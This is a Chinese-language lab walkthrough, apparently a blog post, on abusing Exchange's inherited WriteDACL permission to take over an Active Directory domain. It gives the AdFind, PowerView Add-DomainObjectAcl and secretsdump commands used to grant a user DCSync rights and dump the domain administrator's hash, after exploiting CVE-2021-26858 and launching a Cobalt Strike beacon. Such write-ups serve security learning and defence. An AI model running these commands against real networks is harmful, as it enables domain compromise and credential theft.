Exchange权限介绍
在域环境中,安装Exchange后会添加一个名为Microsoft Exchange Security Groups的OU,其中包括两个特殊的组:Exchange Trusted Subsystem和Exchange Windows Permission,如果获得了这两个组内任意用户的控制权限,就能够继承该组的WriteDACL权限,进而修改域对象的ACL,最终实现利用DCSync导出域内所有用户hash。
我们来到域控上查看Exchange Computers
发现隶属于 Exchange Trusted Subsystem
Exchange Trusted Subsystemyo又隶属于Exchange Windows Permission
默认情况下,Exchange Windows Permissions对安装Exchange的域对象具有WriteDACL权限,那么Exchange Trusted Subsystem也会继承这个权限。
Exchange Windows Permissionsquan权限you有权读取修改winwindows账户和组
当我们获取了exchange服务器后,就可以修改域内 ACL 权限,为指定用户添加Dcsync权限,从而接管整个域。
环境介绍
环境为一台:10.1.1.12(exchange服务器)
10.1.1.3(DC)
如图
我们有一个普通域用户 mail
使用 CVE-2021-26858 打下exchange ,并且system权限
为了方便使用,我们hta上线cs
我们来带exchange上,使用adfind查看dcsync权限
AdFind.exe -s subtree -b "DC=qin9,DC=com" nTSecurityDescriptor -sddl -sddlfilter ;;;"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2";; -recmute -resolvesids
并且使用secretsdump尝试用mail用户导出域管administrator的hash
很遗憾,失败告终
不过这是一台exchange服务器,而且有system权限
我们可以借助powerview2脚本
我们先导入脚本
powershell-import /Users/qin9/Desktop/powerview2.ps1执行powerview2.ps1,给mail用户添加dcsync权限
powershell Add-DomainObjectAcl -TargetIdentity 'DC=qin9,DC=com' -PrincipalIde mail -Rights DCSync -Verbose
然后继续用adfind查看
发现赋予了mail用户 赋予了dcsync权限
然后我们使用
python3 secretsdump.py qin9.com/mail:[email protected] -dc-ip 10.1.1.3 -just-dc-user administrator
域管hash也成功导出
我们横向一下
我们也可以用机器账户exchange 赋予dcsync权限,然后导出域管hash
移除指定用户的dcsync权限
#Remove-DomainObjectAcl -TargetIdentity 'DC=qin9,DC=com' -PrincipalIde mail -Rights DCSync -Verbose原文始发于微信公众号(qin9):Attack Exchange writeACL 接管域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论